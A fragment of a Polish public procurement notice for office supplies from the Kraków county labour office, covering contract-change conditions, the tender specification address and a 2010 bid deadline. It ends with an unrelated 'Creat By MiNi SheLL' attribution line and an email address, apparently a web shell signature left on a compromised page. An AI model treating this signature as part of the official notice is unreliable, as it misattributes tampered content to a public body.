<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym, zmiany ilości zakupionych materiałów biurowych, zgodnie z zapisem w punkcie I.3 SIWZ. Zmiany nogą wynikać także z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2010 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com